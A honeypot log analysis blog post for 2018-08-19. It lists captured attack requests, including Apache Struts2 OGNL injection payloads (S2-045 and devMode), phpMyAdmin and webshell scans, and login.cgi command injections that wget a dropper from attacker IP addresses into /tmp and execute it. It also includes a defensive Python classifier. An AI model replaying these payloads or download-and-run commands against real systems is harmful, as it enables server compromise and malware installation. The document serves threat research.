S-Owl

S(ecurity)Owl

Honeypot log analysis (2018/08/19)

This is a quick analysis of the WOWHoneypot log for 2018/08/19 (Sun), day 77 of operation.
Today's total access count is 273. The full access log is below.

30 2018-08-19 GET /
6 2018-08-19 POST /register.jsp
6 2018-08-19 POST /main.jsp
6 2018-08-19 POST /login/login.jsp
6 2018-08-19 POST /login.jsp
6 2018-08-19 POST /login.do
6 2018-08-19 POST /login.action
6 2018-08-19 POST /index.jsp
6 2018-08-19 POST /index.do
6 2018-08-19 POST /index.action
6 2018-08-19 POST /default.jsp
6 2018-08-19 POST /
6 2018-08-19 GET /index.action
5 2018-08-19 POST /login/indexAction.action
5 2018-08-19 POST /indexAction.action
3 2018-08-19 POST /qq.php
3 2018-08-19 POST /qaq.php
2 2018-08-19 POST /xx.php
2 2018-08-19 POST /q.php
2 2018-08-19 GET /www/phpMyAdmin/index.php
2 2018-08-19 GET /web/phpMyAdmin/index.php
2 2018-08-19 GET /tools/phpMyAdmin/index.php
2 2018-08-19 GET /phpMyAdmin/index.php
2 2018-08-19 GET /claroline/phpMyAdmin/index.php
2 2018-08-19 GET /admin/phpMyAdmin/index.php
1 2018-08-19 PROPFIND /
1 2018-08-19 POST /zuoshou.php
1 2018-08-19 POST /yumo.php
1 2018-08-19 POST /yao.php
1 2018-08-19 POST /xw.php
1 2018-08-19 POST /xw1.php
1 2018-08-19 POST /xshell.php
1 2018-08-19 POST /xiao.php
1 2018-08-19 POST /xiaoma.php
1 2018-08-19 POST /wuwu11.php
1 2018-08-19 POST /wshell.php
1 2018-08-19 POST /w.php
1 2018-08-19 POST /weixiao.php
1 2018-08-19 POST /webslee.php
1 2018-08-19 POST /wc.php
1 2018-08-19 POST /wanan.php
1 2018-08-19 POST /system.php
1 2018-08-19 POST /ssaa.php
1 2018-08-19 POST /s.php
1 2018-08-19 POST /sheep.php
1 2018-08-19 POST /phpstudy.php
1 2018-08-19 POST /pe.php
1 2018-08-19 POST /mz.php
1 2018-08-19 POST /mx.php
1 2018-08-19 POST /min.php
1 2018-08-19 POST /log.php
1 2018-08-19 POST /lindex.php
1 2018-08-19 POST /l8.php
1 2018-08-19 POST /l7.php
1 2018-08-19 POST /ip.php
1 2018-08-19 POST /infoo.php
1 2018-08-19 POST /hm.php
1 2018-08-19 POST /hh.php
1 2018-08-19 POST /feixiang.php
1 2018-08-19 POST /fack.php
1 2018-08-19 POST /defect.php
1 2018-08-19 POST /db_session.init.php
1 2018-08-19 POST /db.init.php
1 2018-08-19 POST /db__.init.php
1 2018-08-19 POST /data.php
1 2018-08-19 POST /conflg.php
1 2018-08-19 POST /cmd.php
1 2018-08-19 POST /cainiao.php
1 2018-08-19 POST /aw.php
1 2018-08-19 POST /aotu.php
1 2018-08-19 POST /angge.php
1 2018-08-19 POST /ak.php
1 2018-08-19 POST /ak47.php
1 2018-08-19 POST /9678.php
1 2018-08-19 POST /56.php
1 2018-08-19 POST /12.php
1 2018-08-19 GET /x.php
1 2018-08-19 GET /xampp/phpmyadmin/index.php
1 2018-08-19 GET /wpo.php
1 2018-08-19 GET /wp-config.php
1 2018-08-19 GET /webdav/
1 2018-08-19 GET /uploader.php
1 2018-08-19 GET /typo3/phpmyadmin/index.php
1 2018-08-19 GET /text.php
1 2018-08-19 GET /test.php
1 2018-08-19 GET /register.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /register.jsp
1 2018-08-19 GET /_query.php
1 2018-08-19 GET /pmd/index.php
1 2018-08-19 GET /pma-old/index.php
1 2018-08-19 GET /pmamy/index.php
1 2018-08-19 GET /pmamy2/index.php
1 2018-08-19 GET /pma/index.php
1 2018-08-19 GET /PMA2/index.php
1 2018-08-19 GET /phpmyadmin/phpmyadmin/index.php
1 2018-08-19 GET /phpMyAdminold/index.php
1 2018-08-19 GET /phpMyAdmin.old/index.php
1 2018-08-19 GET /phpmyadmin-old/index.php
1 2018-08-19 GET /phpmyadmin/index.php
1 2018-08-19 GET /phpMyadmin_bak/index.php
1 2018-08-19 GET /phpmyadmin2/index.php
1 2018-08-19 GET /phpmyadmin1/index.php
1 2018-08-19 GET /phpmyadmin0/index.php
1 2018-08-19 GET /phpma/index.php
1 2018-08-19 GET /phpadmin/index.php
1 2018-08-19 GET /mysql/index.php
1 2018-08-19 GET /mysqladmin/index.php
1 2018-08-19 GET /mysql-admin/index.php
1 2018-08-19 GET /myadmin/index.php
1 2018-08-19 GET /myadmin2/index.php
1 2018-08-19 GET /muhstiks.php
1 2018-08-19 GET /muhstik.php
1 2018-08-19 GET /muhstik-dpr.php
1 2018-08-19 GET /muhstik2.php
1 2018-08-19 GET /main.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /main.jsp
1 2018-08-19 GET /lol.php
1 2018-08-19 GET /login/login.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login/login.jsp
1 2018-08-19 GET /login.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login.jsp
1 2018-08-19 GET /login/indexAction.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login/indexAction.action
1 2018-08-19 GET /login.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login.do
1 2018-08-19 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-19 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33[.]86/d%20-O%20-%3E%20/tmp/ff;sh%20/tmp/ff%27$
1 2018-08-19 GET /login.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login.action
1 2018-08-19 GET /lala.php
1 2018-08-19 GET /lala-dpr.php
1 2018-08-19 GET /java.php
1 2018-08-19 GET /index.php
1 2018-08-19 GET /index.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /index.jsp
1 2018-08-19 GET /index.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /index.do
1 2018-08-19 GET /index.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest
1 2018-08-19 GET /indexAction.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /indexAction.action
1 2018-08-19 GET /index.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET hxxp://112.35.63[.]31:10083/index.php
1 2018-08-19 GET hxxp://112.35.53[.]83:10083/index.php
1 2018-08-19 GET /help.php
1 2018-08-19 GET /desktop.ini.php
1 2018-08-19 GET /default.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /default.jsp
1 2018-08-19 GET /?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest
1 2018-08-19 GET /db_pma.php
1 2018-08-19 GET /db/index.php
1 2018-08-19 GET /db_cts.php
1 2018-08-19 GET /dbadmin/index.php
1 2018-08-19 GET /cmx.php
1 2018-08-19 GET /cmv.php
1 2018-08-19 GET /cmd.php
1 2018-08-19 GET /cmdd.php
1 2018-08-19 GET /admin/PMA/index.php
1 2018-08-19 GET /admin/pma/index.php
1 2018-08-19 GET /admin/phpmyadmin/index.php
1 2018-08-19 GET /admin/phpmyadmin2/index.php
1 2018-08-19 GET /admin/mysql/index.php
1 2018-08-19 GET /admin/mysql2/index.php
1 2018-08-19 GET /admin/index.php
1 2018-08-19 GET //%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f

Below are the access counts after excluding phpMyAdmin-related requests (), GET/POST requests for .php files, and requests to / ().

6 2018-08-19 GET /index.action
6 2018-08-19 POST /index.action
6 2018-08-19 POST /login.action
6 2018-08-19 POST /index.jsp
6 2018-08-19 POST /main.jsp
6 2018-08-19 POST /default.jsp
6 2018-08-19 POST /register.jsp
6 2018-08-19 POST /login.jsp
6 2018-08-19 POST /login/login.jsp
6 2018-08-19 POST /index.do
6 2018-08-19 POST /login.do
5 2018-08-19 POST /indexAction.action
5 2018-08-19 POST /login/indexAction.action
1 2018-08-19 GET /indexAction.action
1 2018-08-19 GET /login.action
1 2018-08-19 GET /login/indexAction.action
1 2018-08-19 GET /index.jsp
1 2018-08-19 GET /register.jsp
1 2018-08-19 GET /main.jsp
1 2018-08-19 GET /default.jsp
1 2018-08-19 GET /login.jsp
1 2018-08-19 GET /login/login.jsp
1 2018-08-19 GET /index.do
1 2018-08-19 GET /login.do
1 2018-08-19 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-19 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33[.]86/d%20-O%20-%3E%20/tmp/ff;sh%20/tmp/ff%27$
1 2018-08-19 GET /webdav/
1 2018-08-19 GET hxxp://112.35.63.31:10083/index.php
1 2018-08-19 GET hxxp://112.35.53.83:10083/index.php
1 2018-08-19 GET /register.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /main.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login/login.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login/indexAction.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /index.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /index.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /index.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest
1 2018-08-19 GET /indexAction.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /index.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /default.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest
1 2018-08-19 GET //%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f 

Today brought a number of unusual and new accesses.

Requests whose path ends in ".action", ".jsp" or ".do" are taken to be attacks targeting Apache Struts2 vulnerabilities.
There are two distinct attack techniques, however, and they appear to come from different attackers.
One is the request to just "index.action", which attacks S2-045, the vulnerability in the Content-Type header. There were about 4 of these today, but they have been observed frequently before.
The other carries what appears to be an attack payload in the request body. I looked into it briefly but could not determine which vulnerability it targets. The requests with the long paths presumably also target Struts vulnerabilities in the same way.
Example access logs of both kinds follow.

GET /index.action HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: %{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):*1.(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#outstr.println(#req.getRealPath("/"))).(#outstr.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

POST /index.action HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.12.4
Content-type: application/x-www-form-urlencoded
Content-Length: 566

debug=command&expression=#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#resp.getWriter().print("web"),#resp.getWriter().print("path:"),#resp.getWriter().print(#req.getSession().getServletContext().getRealPath("/")),#resp.getWriter().flush(),#resp.getWriter().close()

The other one appears to be the technique described here:

http://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/
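As an added example (not the page's or WOWHoneypot's own code), the following Python sorts raw honeypot requests into the families discussed above (S2-045 via the Content-Type header, the devMode debug=command/debug=browser backdoor, OGNL appended to the URL path, the login.cgi download-and-run injections, phpMyAdmin directory scanning) and extracts the download URLs that make up the hunting log. The sample requests are constructed from the shapes in today's log with an RFC 5737 test address and truncated expressions; they are not real captures.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Substrings present in every OGNL payload shape seen in today's log.
OGNL_MARKERS = ("#_memberAccess", "@ognl.OgnlContext", "ServletActionContext")
# Directory names the phpMyAdmin scanner walked through (/pma, /myadmin2, ...).
PMA_PATH = re.compile(r"/(phpmyadmin|pma|myadmin|phpadmin|phpma|mysql|dbadmin)[^/]*/index\.php$", re.I)
# "wget [-flags] URL" as used by the login.cgi injections and the hunting log.
DOWNLOAD_URL = re.compile(r"\b(?:wget|curl)\b(?:\s+-\S+)*\s+(\S+)")

def parse_request(raw):
    """Split a raw HTTP request, as the honeypot logs it, into
    (method, target, headers with lowercase names, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target = lines[0].split()[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.strip()

def classify(raw):
    """Return the attack family a single honeypot request most likely belongs to."""
    method, target, headers, body = parse_request(raw)
    parts = urlsplit(target)
    path, query = unquote_plus(parts.path), unquote_plus(parts.query)
    ctype = headers.get("content-type", "")
    # S2-045: the OGNL expression is carried in the Content-Type header itself.
    if ctype.startswith("%{") or any(m in ctype for m in OGNL_MARKERS):
        return "struts2-s2-045-content-type"
    # devMode backdoor: debug=command (form body) or debug=browser (query string).
    if re.search(r"(^|&)debug=(command|browser)(&|$)", query + "&" + body):
        return "struts2-devmode"
    # OGNL expression appended to the URL path (the very long paths in the log).
    if any(m in path for m in OGNL_MARKERS):
        return "struts2-ognl-in-path"
    # Shell separator plus a downloader in the query: login.cgi injections that fetch a Mirai-variant dropper.
    if ";" in query and DOWNLOAD_URL.search(query):
        return "cmd-injection-download"
    if PMA_PATH.search(path):
        return "phpmyadmin-scan"
    if method == "POST" and path.endswith(".php"):
        return "php-webshell-probe"
    return "other"

def hunting_urls(raw):
    """URLs the request tries to download: what the hunting log records."""
    _, target, _, body = parse_request(raw)
    return DOWNLOAD_URL.findall(unquote_plus(urlsplit(target).query) + "\n" + body)

# Constructed samples modelled on the shapes in today's log (RFC 5737 test
# address, expressions cut down to their markers); not real captures.
SAMPLES = [
    "GET /index.action HTTP/1.1\nContent-Type: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)}\n\n",
    "POST /index.action HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\n"
    "debug=command&expression=#resp=#context.get('x')",
    "GET /login.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29 HTTP/1.1\n\n",
    "GET /?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS) HTTP/1.1\n\n",
    "GET /login.cgi?cli=aa%20aa%27;wget%20http://203.0.113.5/k%20-O%20-%3E%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1\n\n",
    "GET /pma-old/index.php HTTP/1.1\n\n",
    "POST /qq.php HTTP/1.1\n\n",
]
```

Calling classify() on each SAMPLES entry yields the family labels in the order listed, and hunting_urls() on the login.cgi sample returns the single download URL.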


Today's hunting log is below: two Mirai variants and the one that was attacking the Struts2 S2-045 vulnerability.

1 2018-08-19 wget hxxp://212.237.32.62/k
1 2018-08-19 wget hxxp://209.141.33.86/d
1 2018-08-19 wget -c hxxp://23.249.162.123:9998/servic 


That's all for today.

*1:#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class